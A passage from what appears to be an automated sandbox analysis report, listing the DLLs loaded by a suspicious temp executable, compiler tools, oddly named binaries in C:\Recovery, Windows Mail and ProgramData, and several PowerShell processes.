                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\System32\choice.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: mscoree.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: apphelp.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: kernel.appcore.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: version.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: windows.storage.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: wldp.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: profapi.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: cryptsp.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: rsaenh.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: cryptbase.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: sspicli.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: amsi.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: userenv.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: wbemcomn.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: uxtheme.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: rasapi32.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: rasman.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: rtutils.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: mswsock.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: winhttp.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: iphlpapi.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: dnsapi.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: winnsi.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: rasadhlp.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: fwpuclnt.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: winmm.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: winmmbase.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: mmdevapi.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: devobj.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: ksuser.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: avrt.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: audioses.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: powrprof.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: umpdc.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: msacm32.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: midimap.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: dwrite.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: windowscodecs.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: edputil.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: ntmarta.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: dpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: mscoree.dll
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: apphelp.dll
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: windows.storage.dll
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: wldp.dll
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: cryptsp.dll
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: rsaenh.dll
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: cryptbase.dll
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                Source: C:\ProgramData\fontdrvhost.exeSection loaded: mscoree.dll
                                Source: C:\ProgramData\fontdrvhost.exeSection loaded: apphelp.dll
                                Source: C:\ProgramData\fontdrvhost.exeSection loaded: kernel.appcore.dll
                                Source: C:\ProgramData\fontdrvhost.exeSection loaded: version.dll
                                Source: C:\ProgramData\fontdrvhost.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\ProgramData\fontdrvhost.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\ProgramData\fontdrvhost.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\ProgramData\fontdrvhost.exeSection loaded: windows.storage.dll
                                Source: C:\ProgramData\fontdrvhost.exeSection loaded: wldp.dll
                                Source: C:\ProgramData\fontdrvhost.exeSection loaded: profapi.dll
                                Source: C:\ProgramData\fontdrvhost.exeSection loaded: cryptsp.dll
                                Source: C:\ProgramData\fontdrvhost.exeSection loaded: rsaenh.dll
                                Source: C:\ProgramData\fontdrvhost.exeSection loaded: cryptbase.dll
                                Source: C:\ProgramData\fontdrvhost.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
